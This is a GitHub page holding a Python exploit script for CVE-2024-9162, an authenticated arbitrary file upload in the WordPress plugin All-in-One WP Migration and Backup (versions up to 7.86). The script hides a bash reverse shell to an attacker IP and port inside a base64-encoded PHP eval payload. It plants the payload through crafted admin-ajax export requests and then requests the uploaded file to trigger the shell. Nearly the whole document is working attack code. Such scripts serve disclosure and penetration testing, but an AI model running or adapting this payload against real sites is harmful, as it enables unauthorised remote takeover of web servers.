-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathCVE-2024-9162.py
executable file
·48 lines (39 loc) · 3.49 KB
/
CVE-2024-9162.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# Exploit Title: All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary File Upload
# Date: 09/29/2024
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage: https://servmask.com/
# Version: <= 7.86
# Tested on: 7.86
# CVE : CVE-2024-9162
import base64
import requests
import argparse
import urllib.parse
def main():
parser = argparse.ArgumentParser(description="CVE-2024-9162: All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary File Upload")
parser.add_argument("victim_url", help="Target url or ip address.")
parser.add_argument("secret_key", help="The ai1wm_secret_key for the victim site.")
parser.add_argument("attacker_ip", help="The attacking IP address to catch the shell.")
parser.add_argument("attacker_port", help="The attacking port listening for the shell.")
parser.add_argument('-s', '--storage', nargs='?', default='CVE-2024-9162', const='CVE-2024-9162')
parser.add_argument('-f', '--file', nargs='?',default='CVE-2024-9162.php', const='CVE-2024-9162.php')
args = parser.parse_args()
# Reverse shell payload, edit if you'd like something else.
payload = f"shell_exec('bash -c \"/bin/bash -i >& /dev/tcp/{args.attacker_ip}/{args.attacker_port} 0>&1 \" 2>/dev/null');"
payload_bytes = payload.encode("utf-8")
base64_bytes = base64.b64encode(payload_bytes)
payload_string = base64_bytes.decode("utf-8")
payload = f"<?php eval(base64_decode('{payload_string}')); ?>"
encoded_payload = urllib.parse.quote_plus(payload)
headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
data =f"action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D={encoded_payload}&options%5encrypt_password_confirmation%5D=&ai1wm_manual_export=1&storage={args.storage}&file=1&secret_key={args.secret_key}&priority=30&archive={args.file}"
r = requests.post(f"{args.victim_url}/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1", headers=headers, data=data, verify=False)
data =f"action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D={encoded_payload}&options%5encrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&ai1wm_manual_export=1&storage={args.storage}&file=1&secret_key={args.secret_key}&priority=50&archive={args.file}"
r = requests.post(f"{args.victim_url}/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1", headers=headers, data=data, verify=False)
data =f"action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D={encoded_payload}&options%5encrypt_password_confirmation%5D=&ai1wm_manual_export=1&storage={args.storage}&file=1&secret_key={args.secret_key}&priority=60&archive={args.file}"
r = requests.post(f"{args.victim_url}/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1", headers=headers, data=data, verify=False)
print("Triggering the exploit, check your listener...")
r = requests.get(f"{args.victim_url}/wp-content/plugins/all-in-one-wp-migration/storage/{args.storage}/{args.file}", verify=False)
print(r.content)
if __name__ == "__main__":
main()